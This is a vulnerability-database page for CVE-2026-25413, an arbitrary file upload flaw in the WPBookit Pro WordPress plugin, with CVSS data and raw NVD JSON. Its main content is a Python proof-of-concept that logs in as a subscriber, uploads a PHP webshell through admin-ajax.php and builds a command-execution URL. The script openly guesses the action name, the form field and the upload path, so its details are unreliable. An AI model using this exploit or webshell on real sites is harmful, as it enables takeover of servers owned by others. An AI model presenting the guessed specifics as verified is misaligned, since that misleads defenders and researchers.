Security Vulnerability Report
中文
CVE-2026-25413 CVSS 9.9 CRITICAL

CVE-2026-25413

Published: 2026-03-25 17:16:50
Last Modified: 2026-04-24 16:35:20

Description

Unrestricted Upload of File with Dangerous Type vulnerability in iqonicdesign WPBookit Pro wpbookit-pro allows Using Malicious Files.This issue affects WPBookit Pro: from n/a through <= 1.6.18.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WPBookit Pro <= 1.6.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://example.com" login_url = f"{target_url}/wp-login.php" upload_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Common endpoint for WP plugins # Attacker credentials (low privilege) username = "subscriber" password = "password" # Initialize session session = requests.Session() # 1. Authenticate to the WordPress site print("[+] Attempting to login...") data = { "log": username, "pwd": password, "redirect_to": "", "wp-submit": "Log In" } login_response = session.post(login_url, data=data) if "wp-admin" in login_response.text: print("[+] Login successful.") else: print("[-] Login failed.") exit() # 2. Prepare malicious file payload (PHP Webshell) # The vulnerability allows dangerous types, so .php is likely accepted shell_content = "<?php system($_GET['cmd']); ?>" files = { # 'file' field name depends on the plugin's specific implementation 'file': ('exploit.php', shell_content, 'application/octet-stream') } # 3. Construct the upload request # 'action' parameter usually triggers the specific plugin function payload_data = { "action": "wpbookit_upload_action" } print("[+] Uploading malicious file...") upload_response = session.post(upload_endpoint, files=files, data=payload_data) # 4. Check if upload succeeded if upload_response.status_code == 200: print("[+] Upload request sent. Check response:") print(upload_response.text) # If the response contains the file path or success message, construct the shell URL # Assuming the upload directory is /wp-content/uploads/wpbookit-pro/ shell_url = f"{target_url}/wp-content/uploads/wpbookit-pro/exploit.php" print(f"[+] Potential Shell URL: {shell_url}?cmd=ls") else: print("[-] Upload failed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25413", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:50.040", "lastModified": "2026-04-24T16:35:20.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unrestricted Upload of File with Dangerous Type vulnerability in iqonicdesign WPBookit Pro wpbookit-pro allows Using Malicious Files.This issue affects WPBookit Pro: from n/a through <= 1.6.18."}, {"lang": "es", "value": "Vulnerabilidad de carga sin restricciones de archivo con tipo peligroso en iqonicdesign WPBookit Pro wpbookit-pro permite el uso de archivos maliciosos. Este problema afecta a WPBookit Pro: desde n/a hasta &lt;= 1.6.18."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wpbookit-pro/vulnerability/wordpress-wpbookit-pro-plugin-1-6-18-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}]}}